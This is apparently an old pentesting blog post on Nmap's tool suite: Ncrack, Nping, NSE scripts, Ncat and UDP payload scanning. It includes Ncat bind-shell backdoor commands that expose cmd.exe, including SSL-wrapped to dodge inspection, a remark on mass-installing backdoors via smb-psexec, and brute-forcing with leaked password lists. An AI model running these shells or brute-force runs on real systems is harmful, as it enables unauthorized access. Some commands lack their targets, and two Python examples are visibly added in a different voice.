Advanced Nmap

Some of the guys I hack with and I have been talking about the “core” toolset in pentesting… like what could you absolutely not go in without? What we came up with is:

  • nmap
  • metasploit
  • ettercap
  • burp
  • Wireshark

There are tons of tools that came close to that bracket (other proxies, scanners, other MitM tools), but these five have a special place in our hearts. They cover so many pentesting needs that it’s hard to find something this combo can’t do. This list is clearly aimed at external and internal network pentests that do NOT include social engineering, OSINT, and other types of tests.

Tonight I wanted to share some Nmap stuff that I’ve been using lately or am getting ready to start using.

It’s hard to go over Nmap in one writeup for a few reasons. One is that its default purpose (scanning) is a topic in and of itself. Correct timing, parallelism, scan types, IDS evasion, internal scans, external scans, etc. could all have posts of their own, each with heated debate about its validity.

The second reason is that Nmap is no longer just a scanner. Not that anyone who reads this blog wouldn’t know that, but Nmap has grown into a beast of sorts. Nmap has effectively extended itself to replace Medusa (with Ncrack), Hping (with Nping), Nessus/OpenVAS (with the Nmap Scripting Engine), Netcat (with Ncat), and UnicornScan/udp-proto-scanner (with the new Nmap UDP payload scanning), and it also has a host of bolted-on scripts that extend Nmap beyond a normal user’s use case. Today we’ll just go through a few cool things, as you can find a lot about general Nmap scanning techniques in the books below:


Ncrack is a command-line password bruteforcer like Hydra and Medusa. Up until recently I was a stalwart Medusa user, but what brought me over (mostly) was the superior SSH library, RDP password bruting, and easy Nmap-like syntax. Should you want to audit a whole class C for SSH passwords, Ncrack makes this easy:

```
ncrack -p 22
```

Ncrack supports the following protocols:

  • FTP
  • TELNET
  • SSH
  • RDP
  • HTTP(S)
  • SMB
  • POP3(s)

Compared to Medusa this seems like a lot less to offer; Medusa does SQL bruteforcers, R-service bruteforcers, VNC, VMware Authd, SNMP, etc., but in most cases I use Ncrack with Medusa as a backup. The rest of those protocols I can mostly get through Metasploit, which is one less layer of abstraction. In some cases Ncrack can be less stable; in those cases rely on ole Medusa to CYA. We recommend using password lists from SkullSecurity: Ron has made an extensive list of popular site breaches and their associated leaked passwords for pentesters to use with bruteforcing tools.


Nping is another Summer of Code project designed (presumably) to take over Hping duties. Since there is a plethora of Hping versions to carry around, I find it refreshing to have an updated tool for packet manipulation. In general Hping’s utility is to generate custom packets, and using Hping is way easier than implementing custom packets in a scripting language like Python. A major drawback to Hping was its lack of inherent “scanner” type functionality, meaning that unless you created a bash wrapper or TCL script it was a one-target type of tool. Nping fixes this in stellar fashion by supporting Nmap’s target syntax. Although Nmap has done its best to implement the type of scanning one would do with Hping/Nping, nothing beats having a command-line tool to send custom packets. “Custom packets” being a very ambiguous term: Hping has traditionally been used to test firewalls, evade IDS, send PoC/DoS packets, etc. Many have moved over to Scapy as it offers a bit more in the way of customization, but Nping is a welcome addition to packet crafting tools.

NSE (Nmap Scripting Engine)

The Nmap Scripting Engine is a Lua framework to do pretty much anything within Nmap, with the power of Nmap. If you think about it, it was a natural progression. Nmap was already doing service version fingerprinting and banner checking… isn’t that what bigtime vulnerability scanners do? Vulnscanner = port scanner + service version checking (using banner reading, TCP/IP response timing, and other socket response regexing/signatures) + vulnerability correlation. I mean, there’s a bit more to it, but not much. You can see that in that list there’s not much that Nmap didn’t already do. Adding a simple scripting language that anyone can write, on top of the powerful underlying NSE, makes for empowered testers. Some bigtime firms I know have taken vuln scanners out of the rotation in their pentests, opting for specific targeted NSE scripts. In addition, NSE offers a lot to both netpen and webpen; a plethora of scripts are webpen based. There are a modest 194 scripts in SVN, but I know that not everyone is releasing their scripts, which IMO hurts the project’s awesomeness. Lame pentesters are lame. Here are some of our favs:

  • banner – A simple banner grabber which connects to an open TCP port and prints out anything sent by the listening service within five seconds. We’ve used this to scan large domains with services not in the Nmap fingerprint database and pipe the output to files for later inspection.
  • dns-cache-snoop – Performs DNS cache snooping against a DNS server. Replaces easy bash scripting, but nice.
  • hostmap – Tries to find hostnames that resolve to the target’s IP address by querying the online database at Replaces Hostmap which is intermittently broken =(
  • http-brute – Performs brute force password auditing against HTTP basic authentication. Saves some time setting up Burp to do this.
  • http-enum – Enumerates directories used by popular web applications and servers. WIN. We have ported many fingerprints we see often into http-enum’s fingerprint database (in fact we are credited in that source). DirBuster and wfuzz are great and focus on large sets of common words for directory bruteforcing; we use http-enum for more targeted framework bruteforcing… and it works.
  • smb-enum-shares – Attempts to list shares using the srvsvc.NetShareEnumAll MSRPC function and retrieve more information about them using srvsvc.NetShareGetInfo. If access to those functions is denied, a list of common share names is checked.
  • smb-brute – Attempts to guess username/password combinations over SMB, storing discovered combinations for use in other scripts. SMB is the weakest link… goodbye.
  • smb-check-vulns – Checks for vulnerabilities: MS08-067, etc, etc.
  • smb-psexec – This script implements remote process execution similar to the Sysinternals psexec tool, allowing a user to run a series of programs on a remote machine and read the output. This is great for gathering information about servers, running the same tool on a range of systems, or even installing a backdoor on a collection of computers.
  • As well as the more targeted SNMP, MSSQL, MySQL, Oracle, and Lotus enumeration and bruteforce scripts.

In addition, Andre Gironda (@atdre) pointed us to NSE Vulscanner this week, which correlates service banners to OSVDB vulns… which is… WICKED. In this thread you can see that, yes, there are some logistical problems with vulns not being verified (false positives), but this NSE script is a powerful tool in addition to your blanket portscans. Think of how Armitage and db_autopwn work in Metasploit: portscan -> vuln correlation per port. Well, now you are not only leveraging the Metasploit database but the WHOLE OSVDB, at no cost to you. As service-level detection becomes available for this, well, you can imagine a lot of vuln scan companies running scared. A sample run looks like so:

```
nmap -PN -sS -sV --script=vulscan -p25

25/tcp open smtp syn-ack Exim smtpd 4.69
| vulscan: [5330] Exim Configuration File Variable Overflow
| [5896] Exim sender_verify Function Remote Overflow
| [5897] Exim header_syntax Function Remote Overflow
| [5930] Exim Parenthesis File Name Filter Bypass
| [12726] Exim -be Command Line Option host_aton Function Local Overflow
| [12727] Exim SPA Authentication spa_base64_to_bits Function Remote Overflow
| [12946] Exim -bh Command Line Option dns_build_reverse Function Local Overflow
```
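To make the portscan -> vuln correlation step concrete, here is an added Python example written for this post (it is not vulscan’s or Nmap’s code): it parses `-sV` port lines like the ones above and flags banner versions older than a fix version. The advisory table and the scan output are constructed placeholders, not OSVDB data.

```python
import re
# Constructed advisory table (placeholder ids, NOT OSVDB data):
# product -> [(advisory_id, title, first_fixed_version)]
ADVISORIES = {
    "Exim smtpd": [
        ("ADV-0001", "placeholder: remote overflow, fixed in 4.70", (4, 70)),
        ("ADV-0002", "placeholder: local overflow, fixed in 4.73", (4, 73)),
    ],
    "Apache httpd": [
        ("ADV-0003", "placeholder: request parsing DoS, fixed in 2.2.20", (2, 2, 20)),
    ],
}
# An Nmap -sV port line, e.g. "25/tcp open smtp syn-ack Exim smtpd 4.69".
# The reason column (syn-ack, udp-response) only appears with --reason.
PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+open\s+(?P<svc>\S+)\s+"
    r"(?:(?:syn-ack|udp-response)\s+)?"
    r"(?P<product>[A-Za-z][^\d]*?)\s+(?P<ver>\d+(?:\.\d+)+)"
)

def parse_version(text):
    """'2.2.17' -> (2, 2, 17): tuples compare numerically, strings would not."""
    return tuple(int(part) for part in text.split("."))

def parse_port_line(line):
    """(port, proto, product, version), or None when no version was fingerprinted."""
    m = PORT_LINE.match(line.strip())
    if not m:
        return None
    return (int(m["port"]), m["proto"], m["product"], parse_version(m["ver"]))

def correlate(nmap_output):
    """Attach advisory ids to every versioned open port. Banner-based, so
    distro backports show up as false positives: each hit needs verification."""
    findings = []
    for line in nmap_output.splitlines():
        parsed = parse_port_line(line)
        if parsed is None:
            continue  # closed ports, "MySQL (unauthorized)", bare product names, ...
        port, proto, product, version = parsed
        hits = [adv for adv, _title, fixed in ADVISORIES.get(product, []) if version < fixed]
        findings.append((port, proto, product, version, hits))
    return findings

# Constructed sample scan output in the same shape as the vulscan run above.
SAMPLE = """\
25/tcp   open  smtp     syn-ack Exim smtpd 4.69
80/tcp   open  http     Apache httpd 2.2.17 ((Win32) mod_ssl/2.2.17 OpenSSL/0.9.8o)
3306/tcp open  mysql    MySQL (unauthorized)
"""
```

Running `correlate(SAMPLE)` flags the Exim 4.69 line against both placeholder advisories and the Apache 2.2.17 line against the third, while the unversioned MySQL line is skipped.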

So, NSE… get on it. Here are some links to get you hyped:

PS – I like to search for cool non-trunk scripts like this in Google: “nse script nmap”, and to the left sort results by last 6 months (I do this for a lot of hacking tools actually).


Ncat is Nmap’s answer to Netcat. It pretty much does everything Netcat can do, plus it implements IPv6, UDP, and SSL socket connections… no more stunnel! It also has hex output options, SOCKS4 and HTTP proxying, and built-in access control. Irongeek has a video basically showing all the flag actions in practice; you can find that here. Ncat also comes with a nifty exec feature; here we are SSL-wrapping our backdoor:

Backdoor ncat:

```
C:\Windows\System32> ncat -l --exec "cmd.exe" 1337
```


```
root@bt:~# ncat 1337
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

Volume in drive C has no label.
Volume Serial Number is 00E1-F423

Directory of c:\Windows\System32

04/15/2011 03:20 AM .
04/15/2011 03:20 AM ..
07/13/2009 10:37 PM 0409
09/27/2010 10:33 AM 1033
```

Traffic Inspection of backdoor before SSL:

SSL backdoor:

```
C:\Windows\System32> ncat -l --ssl --exec "cmd.exe" 1337
```


```
root@bt:~# ncat --ssl 1337
```

Traffic Inspection of “dir” command using backdoor after SSL:

Nmap UDP Payload Scanning

The issue facing accurate scanning of UDP ports is the nature of UDP programs themselves. Delivering anything other than a legitimate UDP payload to a service usually results in a dropped packet, and silence from an open port is indistinguishable from silence from a filtered one. This is bad news for pentesters, as we want a full and accurate scan of our targets. UDP payload scanning is the solution (most of the time). Instead of scanning with an empty UDP packet, we send a legitimate payload that works with the service we are scanning. If we receive a response, it indicates an open port. Before Nmap 5.21, Nmap did not support UDP payload scanning. Pentesters previously counted on free tools like UnicornScan, whose author Jack C. Louis passed away last year (rest in peace, Jack), or udp-proto-scanner by Portcullis Labs. Although these tools are often stellar, sometimes they are buggy and lack the Nmap-type features we want in a port scanner.

Newer versions of Nmap fix that dilemma by adding the following UDP fingerprints for scanning:

udp/7 echo
udp/53 domain
udp/111 rpcbind
udp/123 ntp
udp/137 netbios-ns
udp/161 SNMP
udp/177 xdmcp
udp/500 ISAKMP
udp/520 route
udp/1645 RADIUS
udp/1812 RADIUS
udp/2049 NFS
udp/5353 zeroconf
udp/10080 amanda
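To show what a “legitimate payload” looks like and why it gets an answer, here is an added Python example (written for this post; it is not Nmap’s code or its payload database) that builds RFC-valid probes for udp/53 and udp/123 from the list above, validates the replies, and classifies a port the way a payload scan does. `probe_udp` assumes Linux, where an ICMP port-unreachable surfaces as `ConnectionRefusedError` on a connected UDP socket, and the fixed transaction id is a demo simplification.

```python
import socket
import struct

# Protocol-valid probes for two ports from the list above. Most UDP services
# drop an empty datagram but answer a well-formed request: that answer is
# what a payload scan keys on.
def dns_query(txid, name="example.com"):
    """Recursive DNS query for an A record, RFC 1035 wire format."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)  # RD=1, QDCOUNT=1
    qname = b"".join(bytes([len(label)]) + label.encode() for label in name.split("."))
    return header + qname + b"\x00" + struct.pack("!HH", 1, 1)  # QTYPE=A, QCLASS=IN

def ntp_request():
    """48-byte NTP packet: LI=0, VN=3, Mode=3 (client), everything else zero."""
    return bytes([0x1B]) + bytes(47)

def is_dns_response(txid, data):
    """A real answer echoes our transaction id and has the QR (response) bit set."""
    if len(data) < 12:
        return False
    rid, flags = struct.unpack("!HH", data[:4])
    return rid == txid and bool(flags & 0x8000)

def is_ntp_response(data):
    """Mode 4 (server) lives in the low three bits of the first byte."""
    return len(data) >= 48 and (data[0] & 0x07) == 4

def probe_udp(host, port, timeout=2.0):
    """Classify one UDP port like a payload scan: 'open' (reply), 'closed'
    (ICMP port unreachable) or 'open|filtered' (silence). Assumes Linux, where
    the ICMP error surfaces as ConnectionRefusedError on a connected UDP socket.
    Ports without a probe get an empty datagram, as a plain UDP scan would."""
    txid = 0x1234  # fixed for the demo; pick a random id in real use
    payload = dns_query(txid) if port == 53 else ntp_request() if port == 123 else b""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.connect((host, port))
        s.send(payload)
        try:
            data = s.recv(512)
        except ConnectionRefusedError:
            return "closed"
        except socket.timeout:
            return "open|filtered"
    check = {53: lambda d: is_dns_response(txid, d), 123: is_ntp_response}.get(port)
    return "open" if check is None or check(data) else "open (unexpected reply)"
```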

Auxiliary Nmap Scripts

There are several scripts for manipulating output and extending Nmap.

Sample output:

```
root@bt:~/smap/scan_data/2011-04-26_16.15.29# cat report-hosts.log
Scan_results generated for 2011-04-26_16.15.29

--[ HOST - List ]--------

IP :: Port :: Service -> Server_Type
--------------------------::--------::----------------------->-----------------------------------------------------------
 :: 10243 :: http -> Microsoft HTTPAPI httpd 2.0 (SSDP.UPnP).
Ignored State: closed (12325)
 :: 8834 :: http -> NessusWWW
 :: 5357 :: http -> Microsoft HTTPAPI httpd 2.0 (SSDP.UPnP).
 :: 3389 :: microsoft-rdp -> Microsoft Terminal Service.
 :: 3306 :: mysql -> MySQL (unauthorized).
 :: 2869 :: icslap? -> .
 :: 1241 :: ssl.nessus -> Nessus Daemon (NTP v1.2).
 :: 1036 :: nsstp? -> .
 :: 1035 :: multidropper? -> .
 :: 1027 :: msrpc -> Microsoft Windows RPC.
 :: 1026 :: LSA-or-nterm? -> .
 :: 1025 :: msrpc -> Microsoft Windows RPC.
 :: 990 :: ftps? -> .
 :: 912 :: vmware-auth -> VMware Authentication Daemon 1.0 (Uses VNC
 :: 554 :: rtsp? -> .
 :: 445 :: netbios-ssn -> .
 :: 443 :: ssl.http -> Apache httpd 2.2.17 ((Win32) mod_ssl.2.2.17 OpenSSL.0.9.8o PHP.5.3.4 mod_perl.2.0.4 Perl.v5.10.1).
 :: 139 :: netbios-ssn -> .
 :: 135 :: msrpc -> Microsoft Windows RPC.
 :: 80 :: http -> Apache httpd 2.2.17 ((Win32) mod_ssl.2.2.17 OpenSSL.0.9.8o PHP.5.3.4 mod_perl.2.0.4 Perl.
```

Happy hacking!
